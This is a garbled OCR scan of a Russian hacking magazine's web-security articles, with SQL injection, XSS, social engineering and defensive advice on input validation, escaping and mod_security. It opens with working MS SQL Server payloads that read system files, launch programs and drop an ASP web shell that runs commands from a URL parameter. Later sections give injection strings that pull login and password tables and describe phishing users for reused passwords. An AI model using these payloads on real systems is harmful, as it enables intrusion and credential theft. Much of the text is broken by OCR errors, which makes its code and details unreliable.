exec sp_oamethod @o, 'run', NULL, 'notepad.exe' 
[Смотрим файл boot.ini] 
declare @o int, @f int, @t int, @ret int 
declare @line varchar (8000) 
exec sp_oacreate 'scripting.filesystemobject', @o out 
exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1 
exec @ret = sp_oamethod @f, 'readline', @line out 
while( @ret = 0 
begin 
print @line 
exec @ret = sp_oamethod @f, 'readline', @line out 
end 
Получаем shell 
declare @o int, @f int, @t int, @ret int 
exec sp_oacreate 'scripting.filesystemobject', @o out 
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\foo.asp', 1 
exec @ret = sp_oamethod @f, 'writeline', NULL, 
'<% set о = server.createobject ("wscript.shell"): o.run( 
request.querystring("cmd") ) %>' 
[Сервер говорит, что он захвачен] 
declare @o int, @ret int 
exec sp_oacreate 'speech.voicetext', @o out 
exec sp_oamethod @o, 'register', NULL, 'foo', 'bar' 
exec sp_oasetproperty @o, 'speed', 150 
exec sp_oamethod @o, 'speak', NULL, 'а11 your sequel servers are belong to,us', 528 


waitfor delay '00:00:05' 
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JavaScript 
взломщика 
Плохая фильтрация 
и: й 
У JavaScript 
Страница, 


которая будет 
показана пользователю 


Схема межсайтового скриптинга 


SQL 


A Tenepb подставь в запрос апостроф или ' OR '1'='1’ 
и посмотри, что получится. Фактически, мы можем 
выполнить произвольный SQL-3anpoc, и случиться 
что-нибудь нехорошее: 


SQL 


Хочу кинуть еще пару хороших идей, как можно BOC- 
пользоваться ЗО! -инъекцией. Для этого мы рассмо- 
трим детали диалектов языка SQL у разных произво- 
дителей. Начнем с MySQL, который делает то, что я 
от него никак не ожидал ;). А проблема проста: если 
SELECT-3anpoc подвержен инъекции, то не факт, что 
его результат будет выведен на экран, но если вни- 
мательно почитать руководство по MySQL, то можно 
найти замечательный функционал — результат за- 
проса можно перенаправить в файл! 


SQL 


Теперь осталось найти каталог, который нас приютит. 
В случае с СМ$ все решается довольно просто — поч- 
ти всегда есть каталог для загрузки файлов upload. 
Именно втакой каталог и стоит перенаправлять вывод. 
Начиная с четвертой версии, MySQL поддер- 
живает объединение запросов при помощи коман- 
ды UNION. Таким образом, можно вывести допол- 
нительную информацию из произвольной таблицы. 
Посмотрим, как это выглядит на примере: 


SQL 


Title и description имеют тип varchar, поэтому пере- 
менной $14 нужно присвоить такое значение, чтобы 
при подстановке получился следующий запрос: 


SQL 
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Сравнение инъекций 


Название Опасность 


Распространненость 


Сложность защиты Объект а 


Code injection — самая низкая низкая скрипт 
высокая (с привелегиями 
веб-сервера) 
SQL Injection высокая средняя средняя база данных 
XSS средняя высокая высокая конечный 
пользователь 
UNION щититься, и XSS порой подвержены даже популяр- 
SELECT login, password FROM users; ные движки и крупные сайты (а-ля MySpace). 
и* В наше время на большинстве сайтов пользо- 
|. ватели имеют возможность создавать свои мате- 


Обрати внимание, как я использовал коммента- 
рий, — при Чпюп-инъекциях это стандартная прак- 
тика отсечения ненужной части строки. 

MS SQL Server — вообще штука веселая. 
При помощи SQL на нем можно даже запускать 
приложения. Конкретные примеры инъекций смо- 
три на врезке и пользуйся на здоровье ;). 
-> — поиск уязвимостей типа code injection (источ- 
ник: «Ten Security Checks for РНР»). Старайся He ис- 
пользовать переменные в качестве параметров у 
функций readfile, fopen, file, include, require. Если по- 
добный функционал все-таки необходим, то можно 
попробовать заменить переменные константами. 
При использовании переменных следует ограни- 
чить файлы, которые могут быть использованы, за- 
ранее определенным списком: 


Uv 


HP 


Если нам действительно необходимо использо- 
вать файл, имя которого определяется динамиче- 
ски, тогда стоит проверять его соответствующим 
регулярным выражением: 


РНР 


В любом случае будет также полезно настроить оп- 
ции allow_url_fopen и open_basedir в файле php.ini. 

>  XSS. Я слежу за новостными рассылками о ды- 
рах в безопасности одной СМ$. 99% уязвимостей в 
модулях этой системы — Х$$. Этим-то и опасен дан- 
ный вид инъекций — от него чрезвычайно трудно 3a- 


риалы и комментировать чужие. Для красивого 
оформления пользователю дается возможность 
вводить данные в формате HTML. Ввод HTML-koga 
может быть разрешен напрямую, либо при помощи 
WYSIWYG-pegaktopa. Казалось бы, все довольны! 
Особенно взломщики ;). Есть хорошая пословица: 
«Где HTML, там и JavaScript». Таким образом, 
при вводе можно использовать тег <Script> для ис- 
полнения произвольного JavaScript (и не только 
его, кстати). А если мы можем использовать скрип- 
ты, которые исполняются на стороне пользователя, 
значит, мы можем украсть его куки! А тут уже и до 
взлома аккаунта недалеко... 

> — фрагментированные Х$$-атаки. Часто быва- 
ет так, что информация, вводимая пользователем, 
хорошо фильтруется, и к форме на кривой козе 
не подступишься. Но если в ней несколько полей, 
например, «название материалов» и «содержание 
материалов», то можно попробовать более слож- 
ный вид атаки — фрагментированный. При таком 
подходе, необходимо, чтобы данные из разных по- 
лей формы выводились последовательно, и тогда 
появляется вероятность того, что вместе «безобид- 
ные строчки» станут грозным оружием. 

> — аудит Х$5-уязвимостей (источник: «HTML 
Code Injection and Cross-site scripting»). Проверка 
форм на исполнение скрипта. Открываем HTML- 
страницу для аудита и в каждое поле поочередно 
вводим следующее: 


Дальше жмем кнопку «Отправить», и если в резуль- 
тате выскакивает сообщение или появляются 
ошибки на страничке, то форма уязвима. 

Проверка СЕТ-запросов на исполнения скрипта. Те- 
перь то же самое делаем ссылками вида «?var=qwer- 
ty» (аналогичным образом проверим и куки). 

НТМЕ-инъекция. Во все элементы ввода пробу- 
ем вставить ";!--"<CSS_Check>=&{()}. Строка начи- 
нается с двух апострофов и заканчивается фигур- 
ной скобкой. На следующей странице ищем 
«<CS_Check>» (без кавычек), — если нашли, то 
страница уязвима. Также остается возможность 
взлома, если часть символов не заэкранировалась. 
> = ‘сравнение и анализ. У всех описанных выше 
атак много общего. Как правило, они производятся 
на хорошо защищенный и настроенный сервер. 
То есть по части администрирования вопросов 
не возникает, поэтому приходится искать пробелы 
в работе программистов. Самой опасной, на мой 
взгляд, дырой является возможность выполнить 
произвольный РНР-код на стороне сервера, после 
чего можно получить доступ к базам данных и вы- 
полнить JavaScript. 

По распространенности сейчас лидируют 
Х$5-атаки, чуть отстали ЗОЕ-инъекции. Поясню — 
пик использования ЗОЁ-инъекций прошел некото- 
рое время назад: вспомните хотя бы бесконечные 
недоработки PHP-Nuke :). Что же касается инъек- 
ций кода, то скрипты, подверженные этим болез- 
ням, водятся только в самописном или незащищен- 
ном коде, хотя есть и исключения из этого правила. 

Переходим к сложностям защиты. Здесь в ли- 
дерах XSS, немного отстает SQL, и позади — 
инъекции РНР-кода. Чтобы понять, почему именно 
так распределились призовые места, нужно взве- 
сить, сколько уходит времени (денег) на защиту 
от той или иной напасти © 


СОЦИАЛЬНЫЙ 
ИНЖИНИРИНГ 
ВУ ЕХАМРЕЕ 


Чтобы узнать пароль человека, можно 
использовать свои знания веб-техноло- 
гий, а можно — его доверчивость. 
Это обычно называют социальным ин- 
жинирингом. Хочу рассказать один при- 
мер подобного приема, надеюсь, ты сде- 
лаешь выводы :). Цель: получить логин 
и пароль человека его аккаунта на сайте. 


Информация: человек очень любит ХХХ. 
«ХХХ» — это не то, о чем ты подумал, 
апроизвольная тема, которой увлекает- 
ся потенциальная жертва ;). Для начала 
необходимо сделать сайт на эту тему 
с большим количеством информации. 
Кроме материалов на сайте будет воз- 
можность их комментирования или, ска- 
жем, форум. И для того, чтобы стать ак- 
тивным пользователем сайта, надо заре- 
гистрироваться на нем. А воттут — сам- 
ое интересное: у многих людей на всех 
сайтах пароли одинаковые! 

В таком случае может возникнуть 
две проблемы: жертва может либо не 3a- 


регистрироваться на сайте, либо пароль 
может быть другим. Поэтому сайт надо 
наполнить интересными материалами 
и дать незарегистрированным пользова- 
телям возможность просматривать 
только их часть. Вторая проблема нам- 
ного серьезней, но и из нее можно из- 
влечь определенную пользу. Во-первых, 
пароль может дать информацию о том, 
как жертва придумывает пароли. 
Во-вторых, можно обнулить его пароль 
и прислать письмо «У нас база полетела, 
зарегистрируйтесь еще раз» :). 

Вывод: придумывайте пароли разные 
и длинные — Df!2go#_*_7M, например. 


журнал 
о карманных компьютерах, 
ноутбуках, смартфонах 
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Мобильные — 


>  трикруга обороны на стороне клиента. Нач- 
нем с самого простого — с отпугивания «юных ха- 
керов» ;). Итак, малолетнее создание открыло брау- 
зер, зашло на твой сайт, нашло форму и пытается 
своими коварными ручками ввести туда что-нибудь 
нехорошее. Прежде всего, воспользуемся возмож- 
ностями языка HTML. Для начала выберем подхо- 
дящий элемент управления, например, если надо 
выбрать «место жительства», то безопасней будет 
использовать выпадающий список (а не строку вво- 
да). Что касается последней, то желательно вы- 
брать и максимальную длину для строки ввода. 

Второй круг обороны будет работать на Ja- 
vaScript, который поможет нам подвергнуть строго- 
му аудиту все, что пользователю вздумается вве- 
сти внаши формы. Мы можем, например, убедить- 
ся, что введен действительно e-mail, а He SQL-3a- 
прос, который выдаст злоумышленнику пароли 
всех пользователей. 

Третий и самый последний круг исповедует 
идеологию AJAX, поэтому не является чисто клиент- 
ским. После заполнения очередного поля мы сделаем 
запрос на сервер о правильности введенных данных. 

Рассмотрим плюсы и минусы данного подхо- 
да. Он, безусловно, отпугнет взломщиков-дилетан- 


веб-приложений 


вакцина для сайта 


Создание многоуровневой защиты от взлома 
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«МОЙ САЙТ — МОЯ КРЕПОСТЬ» — ТАКИМ ДОЛЖЕН БЫТЬ ДЕВИЗ ВСЕХ BEB- 
РАЗРАБОТЧИКОВ. В ЭТОЙ СТАТЬЕ Я РАССКАЖУ, КАК КАМЕНЬ ЗА КАМНЕМ И КИРПИЧ ЗА 
КИРПИЧОМ ПОСТРОИТЬ ТАКУЮ КРЕПОСТЬ. МЫ НАЧНЕМ С ЗАЩИТЫ НА СТОРОНЕ КЛИЕНТА 


И ЗАКОНЧИМ ОБОРОНОЙ СЕРВЕРНОЙ ЧАСТИ. 


Борис Вольфсон 


тов, которые не умеют пользоваться ничем кроме 
браузера. Отмечу также еще один приятный эф- 
фект — улучшение юзабилити сайта, ведь при не- 
правильном заполнении формы пользователь еще 
до ее отправки получит соответствующее сообще- 
ние. Минус у защиты на стороне клиента только 
один — обойти ее проще пареной репы, так что сох- 
раняем страницу у себя на сервере и отключаем в 
браузере JavaScript. А еще лучше — работаем не 
через браузер, а с помощью скрипта. Так что защи- 
Ty на стороне клиента можно считать рвом вокруг 
нашей крепости. А поскольку ров — это самое-сам- 
ое начало, то приступим к возведению стен =). 

> — защищаемся на сервере. Сразу оговорюсь, 
какие аспекты я освещу в следующей части статьи. 
Здесь ты не услышишь ни о тонких настройках бе- 
зопасности в Линукс, ни о том, как правильно со- 
брать защищенный апач и какие модули к нему при- 
крутить. Не будет произнесено ни слова о настрой- 
ках РНР (любимые мои magic quotes). Оставим эти 
дела сисадминам, — они не зря свой хлеб едят, а 


ПРОСТАВЬ ОПЦИИ DISPLAY_ERRORS = OFF И LOG_ERRORS = ON 
ДЛЯ ОТКЛЮЧЕНИЯ ПОКАЗА ОШИБОК И ДЛЯ ВКЛЮЧЕНИЯ 


ИХ ЖУРНАЛИРОВАНИЯ 


сами займемся программированием. Бросим бе- 
глый взгляд на схему, по которой нам предстоит ра- 
ботать дальше (смотри схему 1). 

> — проверка входных данных. Для начала опре- 
делим, откуда наш скрипт может получать потен- 
циально опасную информацию. Первое, что прихо- 
дит Ha ум — это формы, которые заполняет пользо- 
ватель. Данные из них могут передаваться двумя 
методами. При использовании метода РОЗТ дан- 
ные поступают скрипту на стандартный вход, аесли 
применяется метод СЕТ, то информация передает- 
ся в адресной строке: 


URL 
http: //www.example.ru/index.php 
?variable=value 


Ты любишь печенье? Нет? A BOT взломщики любят, 
ведь часть информации передается именно через 
куки. Обычно это идентификатор сессии и другая 
информация, которая сохраняется во время сер- 
финга юзера по сайту. Для скрипта, написанного на 
РНР, все вышеописанные методы получения вне- 
шней информации практически равнозначны, поэ- 
тому ты можешь использовать массив $ REQUEST 
(правда, это не очень безопасное решение). 

Вроде бы все, но нет! Подумай, откуда еще 
скрипт получает данные? Конечно, из БД (или из 
редких нынче текстовых файлов)! Возникает зако- 


номерный вопрос: «А почему мы не можем дове- 
рять информации, полученной из базы данных?». 
Есть два источника угрозы. Во-первых, взломщик 
мог получить доступ к базе данных и занести туда 
произвольную информацию, например, с помо- 
щью 5ОЕ-инъекции. Во-вторых, есть такая нехоро- 
шая вещь, как XSS — межсайтовый скриптинг. В 
данном случае, злоумышленник мог положить в 
базу данных информацию, используя наши же 
скрипты. Например, он может написать в гостевой 
книге и в комментарии несложный JavaScript, ко- 
торый передаст ему куки всех пользователей, его 
прочитавших. Поэтому фильтры проверки надо на- 
кладывать на данные и при их поступлении от 
пользователя, и при выдаче этих данных самому 
пользователю. 

> | типы проверок. Откуда могут поступить вре- 
доносные строчки, мы с тобой выяснили, теперь 
рассмотрим, что в них может быть злого и как с эт- 
им бороться. Начнем с самого простого — ограни- 
чим длину вводимых пользователем данных. Та- 
кая банальная проверка может понадобиться для 
работы с базами данных. Также следует прове- 
рить все поля для введения этих данных, если за- 
ранее известен их тип (в частности, на входе мы 
можем получить число или дату и осуществить 
необходимую проверку). В РНР можно использо- 
вать функцию is_numeric для проверки «на число», 
правда, с осторожностью — в разных версиях ре- 
зультаты ее работы будут немного отличаться. 
В общем случае удобно использовать регулярные 
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ВКЛЮЧИ ОПЦИЮ MAGIC_QUOTES_GPC ДЛЯ АВТОМАТИЧЕСКОГО 
ЭКРАНИРОВАНИЯ ВСЕХ ВХОДЯЩИХ ДАННЫХ 


выражения, которые удачно реализованы во мно- 
гих языках или библиотеках. Для проверки на кор- 
ректность адреса электронной почты можно ис- 
пользовать такой гедехр: 


РНР 


Что касается проверки входных данных на принад- 
лежность к миру чисел, то регулярные выражения 
могут помочь и здесь. Давай, кстати, немного 
усложним задачу: входной параметр должен быть 
целым числом без знака. Для этого сначала уберем 
пробельные символы в начале и в конце строки, 
а затем проверим строку регулярным выражением. 


РНР 


Регулярное выражение «([0-9])+$» (без кавычек) 
означает, что строка должна содержать только ци- 
фры и их количество должно быть не меньше од- 
ной. Аналогичные регулярные выражения необхо- 
димо использовать и для остальных данных. 
Лично я люблю использовать класс Validate 
из библиотеки PEAR, который позволяет прово- 
дить достаточно сложные проверки в одну строчку: 


Методы класса Validate возвращают false, если npo- 
верка не пройдена. Сначала мы проверяем имя 
пользователя: оно должно состоять только из букв, 
цифр и пробелов. Затем мы поверяем адрес элек- 
тронной почты, и, наконец, убеждаемся, что возраст 
пользователя — это число в диапазоне от 0 до 100. 


function is_unsigned_integer($val) 
| 
| ¥eturn eregi(" (10-91) +8", Sval); 
| 
> 


Схема 1. Защита Ha стороне сервера 


Куки —— > Ошибки ввода 
Логи 
СЕТ < > | Ненайденные страницы 
Проверка r 
входных данных 
POST < > Длина входа 
БД ——_ > SQL-UHbeKNA 
Хеш OT паролей < А HTML 
Безопасность г | 
Автоген ия паролей | < [> Xx 
opal apo Типы проверки гы 
Устойчивые пароли < > Тип параметра 
Пользователи < 
Опасные действия ‹ 5 Фильтрация 
с паролем спецсимволов 
Привязка IP ‹ '—>| Проверка реферов ==> Фильтрация НЕХ 
к сессии 
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> = экранируем спецсимволы. Спецсимволы нас, 
прежде всего, не устраивают в том случае, когда 
записи информации производятся в базу данных, 
поскольку в них наверняка кроется великое-пре- 
великое зло 5О!-инъекций и XSS-atak. В этом 
смысле, РНР предлагает нам целый арсенал 
средств борьбы с подобного рода непрятными 
уязвимостями. Все, что от нас неукоснительно тре- 
буется — это использовать их. Приведу список функ- 
ций, которые следует использовать для экраниро- 
вания (смотри таблицу 1). 

Похоже, настало время рассказать про та- 
gic_quotes, о которых я торжественно обещал мол- 
чать в начале главы. Эта опция автоматически 
экранирует данные из массивов $_GET, $_POST, 
$_СООКЕ. Значит, при написании кода нам надо 
это учитывать, чтобы не добавить два раза обрат- 
ные слеши: 


РНР 


i 


> BBcode и wiki. Иногда все-таки необходимо 
дать пользователю возможность форматировать 
введенный им текст, но разрешать напрямую вво- 
дить теги слишком опасно. Самым простым выхо- 
дом будет использование какой-либо разметки, на- 


ПОЛИТИКА 
БЕЗОПАСНОСТИ 
ДЛЯ . 
ПОЛЬЗОВАТЕЛЕИ 


Взломщик может пытаться сломать 
не весь сайт, а только получить доступ 
к аккаунту отдельного пользователя. И 
тут встает вопрос социального характе- 
ра. Попробуем решить его при помощи 
программирования ;). 

Для захвата аккаунта хакеру необхо- 
димо завладеть логином и паролем 
пользователя. Логин обычно находится 
во всеобщем доступе и служит иденти- 
фикатором пользователя, а вот пароль, 
по идее, знает только сам пользова- 
тель. Теперь цель ясна — надо защи- 
тить пароль ;). 

Strong password. Самым «тупым» 
методом взлома пароля является brute- 
force, проще говоря, перебор. Обычно 
для перебора используют словари, ли- 
бо просто перебирают всевозможные 
комбинации по заданной маске. Нашей 
первой задачей будет борьба с подбо- 
ром. Для этого пароль должен быть до- 
статочно длинным — более 6 символов 
и содержать разнообразные символы: 
цифры, строчные и прописные буквы. 
По мере необходимости длину пароля 
можно увеличить, а в необходимые 
символы добавить еще и знаки препи- 
нания. Маленьким примечанием к дан- 
ному параграфу будет необходимость 
блокировать вход пользователя на 
сайт (минут, скажем, на 30) после 3-5 
неудачных попыток ввода логина и па- 


роля. В таком случае взломщику при- 
дется использовать прокси, которые 
при большой необходимости можно 
также блокировать. 

Для более мощной проверки паро- 
ля рекомендую использовать расшире- 
ние CrackLib. Оно позволяет прогнать 
пароль по словарю и осуществить ряд 
дополнительных проверок: 


РНР 
// Загружаем словарь 

// Проверяем пароль 

// Получаем результат проверки 
$res = crack_getlastmessage(); 
echo $гез; // ‘strong password’ 

// Закрываем словарь 
crack_closedict($dictionary); 


Сюда же отнесу такую возможность, 
как смена паролей через определен- 
ный промежуток времени. Такая оп- 
ция не даст взломщику возможность 
подбирать пароль брутфорсом в те- 
чение года. 

Автогенерация паролей. Зачем му- 
чить пользователей и заставлять их 
придумывать пароли длиной в 10 букв 
и цифр, когда проще это сделать про- 
граммно? Заодно можно будет прове- 
рить пароль на уникальность, что еще 
больше повысит безопасность. 

Хеш от паролей. Представь себе 
подобную картину — взломщик полу- 


чил доступ на чтение базы данных 
пользователей твоего сайта... и никак 
не может воспользоваться этой ин- 
формацией ;). Это не моя больная 
фантазия, а реальность, если вместо 
паролей ты хранишь их хеши. Хеш — 
ЭТО «уникальная» строка (или число), 
которая генерируется по паролю при 
помощи специальной функции, на- 
пример п95. По хешу восстановить 
саму строку практически невозможно, 
поэтому этот способ хранения паро- 
лей очень надежен. 

Опасные действия. Базу пользова- 
телей у нас уже крали, теперь предпо- 
ложим, что взломщик смог завладеть 
сессией пользователя, то есть работа- 
ет под его логином. Ситуация типич- 
ная — можно просто подождать, пока 
человек выйдет из-за компа, если 
речь идет об офисе, или попробовать 
украсть куки с идентификатором сес- 
сии. Первое, что попытается сделать 
злой хакер, — это сменить пароль. 
Именно при подобных действиях надо 
повторно запрашивать пароль пользо- 
вателя, ведь если взломана сессия, 
нам удастся предотвратить крупный 
ущерб. К опасным действиям стоит 
отнести: удаление аккаунта, крупные 
финансовые транзакции, массовую 
рассылку писем и прочее. 

Привязка сессии K IP. Чтобы взлом- 
щику было сложней завладеть сесси- 
ей, надо кроме идентификатора хра- 
нить также IP пользователя. Такой 
подход сделает невозможным работу 
с другого компьютера даже при имею- 
щемся правильном идентификаторе 
сессии. 


проверка источника 


КОГДА Я РАССКАЗЫВАЛ О ЗАЩИТЕ 

НА КЛИЕНТСКОЙ СТОРОНЕ, 

Я ОГОВОРИЛСЯ, ЧТО СТРАНИЦУ 
МОЖНО СОХРАНИТЬ НА ДРУГОМ 
СЕРВЕРЕ ИЛИ ЛОКАЛЬНОЙ МАШИНЕ 

И ПОДПРАВИТЬ, КАК ТЕБЕ НРАВИТСЯ. 
НО ЭТУ БРЕШЬ МОЖНО НЕМНОГО 
ЗАЛАТАТЬ, ПРОВЕРЯЯ, ОТКУДА К НАМ 
ПРИШЕЛ ПОЛЬЗОВАТЕЛЬ. ДЕЛАЕТСЯ 
ЭТО ПРИ ПОМОЩИ ПЕРЕМЕННОЙ 
$_SERVER[«HTTP_REFERER»], КОТОРАЯ 
КАК РАЗ И СОДЕРЖИТ ПРЕДЫДУЩУЮ 
СТРАНИЦУ, А НАМ ОСТАНЕТСЯ ТОЛЬКО 
ПРОВЕРИТЬ, ДЕЙСТВИТЕЛЬНО ЛИ 
ПОЛЬЗОВАТЕЛЬ ПРИШЕЛ ОТТУДА. 


ОДНАКО У ВЗЛОМЩИКА ЖЕ ЕСТЬ 

ДВЕ ВОЗМОЖНОСТИ — ЛИБО ПРОСТО 
ИСПОЛЬЗОВАТЬ TELNET И С ЕГО 
ПОМОЩЬЮ СФОРМИРОВАТЬ ЗАПРОС, 
ЛИБО НАПИСАТЬ СКРИПТ И ИСПОЛЬЗО- 
ВАТЬ ЕГО, ВЕДЬ ЗНАЧЕНИЕ ПЕРЕМЕН- 
НОЙ $_ЗЕВУЕВ[«НТТР_ВЕЕЕВЕВ»] 
ФОРМИРУЕТСЯ НА СТОРОНЕ КЛИЕНТА. 
ВЫВОД: ТАКАЯ ЗАЩИТА СПОСОБНА 
ОТПУГНУТЬ ЛИШЬ НЕПРОФЕССИОНАЛЬ- 
НОГО ВЗЛОМЩИКА, А ПРОФЕССИОНАЛУ 
ОНА ПРОСТО ДОСТАВИТ НЕБОЛЬШОЕ 
НЕУДОБСТВО. 


пример BBcode или wiki. В таком случае при созда- 
нии входных данных пользователь использует огра- 
ниченный язык разметки, который затем конверти- 
руется в HTML. Пользователю мы дадим возмож- 
ность выделять шрифт полужирным и курсивом: 


BBcode 


Дальше надо просто заменить теги на их НТМЁ-ана- 
логи. Каждый тег надо обрабатывать отдельно, а не 
просто сменить квадратные скобки на угловые. Тог- 
да на выходе мы получим: 


HTML 


— 


Такой подход позволяет довольно просто избежать 
угрозы Х$$-инъекций, да и реализуется он без осо- 
бых напрягов. Другой вариант (менее безопас- 
ный) — разрешить пользователю вводить только 
определенные теги, а остальные отсеивать. Тот же 
пример будет теперь выглядеть так: 


ВВсоде 

$8 = strip_tags($s, "<em><strong>"); 

Хочу сразу предупредить, что подобный вариант — 
не панацея: некоторые форумы, использующие 
BBcode, были успешно взломаны при помощи XSS. 
> база данных: специфика. Есть несколько со- 
ветов, которые можно дать тем, кто активно исполь- 
зует базы данных. Во-первых, можно использовать 
препарированные запросы, которые поддержива- 
ются большинством библиотек для работы с база- 
ми данных. На Перле создание и исполнение тако- 
го запроса выглядит примерно так: 


Perl 

Sst = Sdb->prepare("SELECT user_name 
FROM users WHERE id = ?;"); 
Sst->execute(Semail); 


Первая строка формирует запрос и посылает ero Ha 
сервер, где он компилируется. Обрати внимание на 
тот факт, что параметр id заменен знаком вопроса и 
будет подставлен при исполнении. Вторая строка 
просто передает параметр для запроса, который уже 
не парсится сиквелом, а просто считается данными. 


Kaspersky" р 
Internet Security 


Таблица 1 


string addslashes ( string str ) 


string quotemeta ( string str ) 
string htmlispecialchars ( string string ) 


string htmlentities ( string string ) 


string mysql_real_escape_string 
( string unescaped_string ) 


Совет номер два будет касаться хранимых проце- 
дур и триггеров. На данный момент все современ- 
ные серверы баз данных поддерживают такую 
функциональность (MySQL начиная с пятой вер- 
сии). Напомню, что хранимая процедура — это 
скомпилированный запрос на сервере, которому 
при исполнении могут передаваться параметры. 
А триггер — это специальная хранимая процедура, 
которая выполняется при определенном событии, 
например, при удалении записи из БД. Использо- 
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защита от вредоносных программ, хакеров и спама 
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добавляет к символам апострофа, кавычкам, 
обратному слешу и нулевому байту слеш 
добавляет слеш к символам .\+*?[^]($) 
переводит в НТМЕ-сущности амперсанд, кавычки, 
апостроф, знаки «больше» и «меньше» 

аналог htmlispecialchars, но использует 
НТМЕ-сущности (энтитисы) 

экранирует строку для использования 

в mysql_query 


вание этих механизмов не только увеличит произ- 
водительность приложения, но и повысит его за- 
щищенность. 

> outro. B этой статье я привел достаточно мно- 
го способов защиты. Чтобы выбрать подходящий 
набор методов, необходимо тщательно подумать, 
насколько мощная система безопасности нужна те- 
бе на сайте, иначе твои высокие стены не сможет 
преодолеть не только взломщик, но и обычный 
пользователь. © 


Персональные продукты 
нового поколения 


Ваши открытия теперь в безопасности. 
Каждый раз, когда вы открываете новое - 
новые эмоции и знания, новые письма от 
друзей и деловых партнеров, новые 
файлы и программы, новые веб-сайты, - 
вы можете делать это свободно. 


Потому что о безопасности вашего 
информационного пространства позабо- 
тится новое поколение программных 
продуктов "Лаборатории Касперского" - 
одно из лучших в мире решений для 
безопасности домашних компьютеров. 


www.kaspersky.ru, www.viruslist.ru 
тел./факс +7 (495) 797 8700 


Партнеры "Лаборатории Касперского": www.kaspersky.ru/buyoffline 
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38 ВОКРУГ ЗАПРЕТОВ 
46 ЗАПАХ ПРОПАСТИ 


Чтобы микробов не было во рту, используют зубную 
пасту. А что применить для защиты от «микробов» 
web-cepBepa? Простым решением, к сожалению, 
не обойтись: необходим целый комплекс мер, поз- 
воляющих построить эффективную защиту. 

Почему именно комплекс? Дело втом, что дол- 
жно быть несколько уровней защиты. Один уровень 
всегда может дать сбой: 


— МОГУТ НАЙТИ ДЫРУ; 
— МОЖНО ОШИБИТЬСЯ В НАСТРОЙКАХ; 
— МОГУТ ОБОЙТИ ОДИН УРОВЕНЬ ЗАЩИТЫ. 


В хорошо продуманной системе, даже если в сцена- 
рии будет ошибка, хакер не сможет далеко продви- 
нуться. Правильная настройка сервера, распреде- 
ление прав в базе данных, постоянный мониторинг 
и некоторые другие действия позволяют защитить 
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Как защитить веб-сервер 


НА 100% БЕЗОПАСНЫЙ САЙТ СДЕЛАТЬ СЛОЖНО ДАЖЕ ПРОФЕССИОНАЛУ. А ЕСЛИ ЧЕРЕЗ 
ДЫРУ В КАКОМ-НИБУДЬ САЙТЕ ВЗЛОМАЮТ ВЕСЬ СЕРВЕР, ТО ЭТО БУДЕТ СЕРЬЕЗНАЯ 
ПРОБЛЕМА И УДАР ПО ПРЕСТИЖУ ХОСТЕРА. ЧТО ДЕЛАТЬ ХОСТИНГОВЫМ КОМПАНИЯМ, 
ЧТОБЫ ЗАЩИТИТЬ СЕБЯ И СВОИХ КЛИЕНТОВ? РАССМОТРИМ «СРЕДСТВА ЛИЧНОЙ 
ГИГИЕНЫ», КОТОРЫЕ СПАСУТ ОТ НЕЗАПЛАНИРОВАННЫХ СИТУАЦИЙ И ПОВЫСЯТ 


ИММУНИТЕТ К ЗЛОУМЫШЛЕННИКАМ 


сервер даже при наличии (а они когда-нибудь обя- 
зательно всплывут) ошибок в безопасности. 

Настройку сервера можно условно разделить 
на две части: 


1 ТЩАТЕЛЬНОЕ КОНФИГУРИРОВАНИЕ 
СЕРВЕРА И ОТКРЫТЫХ СЕРВИСОВ. 


2 УСТАНОВКА ДОПОЛНИТЕЛЬНОГО 
СОФТА ДЛЯ МОНИТОРИНГА И СОЗДАНИЯ 
ДОПОЛНИТЕЛЬНЫХ УРОВНЕЙ ЗАЩИТЫ. 


3» — конфигурирование сервера. Все начинается 
с конфигурирования сервера. После установки ОС 


все параметры установлены по умолчанию, то есть 
так, как посчитал правильным установить их разра- 
ботчик дистрибутива. Тебе же необходимо просмот- 
реть все параметры: включить все, что нужно, и — 
самое главное — запретить то, что не будешь ис- 
пользовать. Лучше просматривать абсолютно все 
параметры, особенно если ты устанавливаешь 
Ипих-сервер. Дело в том, что, в зависимости 
от дистрибутива, настройки в конфигурационных 
файлах могут очень сильно отличаться. Ты можешь 
думать, что какое-то действие запрещено, а разра- 
ботчик конкретного дистрибутива или новой версии 
ядра посчитает иначе и изменит конфигурацию. 
Сплошь и рядом встречается, что в новых версиях 
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Модуль mod_security 


ОС или ядра какие-то параметры становятся реко- 
мендуемыми к использованию, а какие-то, наобо- 
рот, выходят из обращения. Необходимо отслежи- 
вать тенденции и контролировать конфигурацию. 
> — база данных. Следующий уровень защиты — 
права доступа к базе данных и файловой системе. 
База данных — одновременно важное хранилище 
и основная лазейка для атаки SQL Injection при npo- 
никновении на сервер и сборе информации. Поэто- 
му сценарии не должны работать от имени приви- 
легированного пользователя. Учетная запись долж- 
на иметь только те права, которые ей необходимы 
для работы сценария, и ни грамма больше. 

Любой несанкционированный доступ к сис- 
темной информации должен запрещаться. В 99% 
случаев при работе с MySQL-cyeHapuaM не нужен 
доступ к системной базе MySQL, где хранится вся 
информация о пользователях, правах доступах и 
объектах сервера баз данных. Доступа не должно 
быть не только на запись или обновление, но и на 
просмотр данных. Очень часто даже просмотр сис- 
темных данных может дать хакеру массу важной 
для безопасности информации. 

При работе с базой данных MS SQL Server 
большинство программистов используют уже су- 
ществующую по умолчанию роль public. B stom и 
заключается ошибка, ведь этой роли доступно мно- 
гое. Лучшее правило — никогда не используй гото- 
вое, а создавай собственную роль и пользователя. 
> | модули web-cepBepa. Следующий этап обес- 
печения безопасности — модули для Apache. 
Они позволяют построить эффективную защиту от 
атак типа SQL Injection, XSS и многих других. 
Но просто установить модуль — не значит решить 
все проблемы. Нужно грамотное конфигурирование 
и запрет всего, что может нанести вред серверу. 
>  то4 зедиту. Несмотря на то, что безопас- 
ность Web-CepBepa в основном зависит от сценари- 
ев, которые выполняются на сервере, и программис- 


тов, которые пишут эти сценарии, есть возможность 
защитить сервер, не обращая на них внимания. 
В этом поможет бесплатный модуль для Apache 
mod_security. Принцип работы модуля схож с сете- 
вым экраном, который встроен в ОС, только в дан- 
ном случае он специально разработан для работы 
с протоколом НТТР. Модуль анализирует запросы 
пользователей и выносит свое решение о возмож- 
ности пропустить запрос к web-cepBepy или отказе 
на основе правил, которые задает администратор. 
Правила определяют, что может быть в запросе, 
а что нет. 

В запросах, которые пользователь отправляет 
на сервер, содержится URL-agpec, с которого необ- 
ходимо взять документ или файл. Что можно задать 
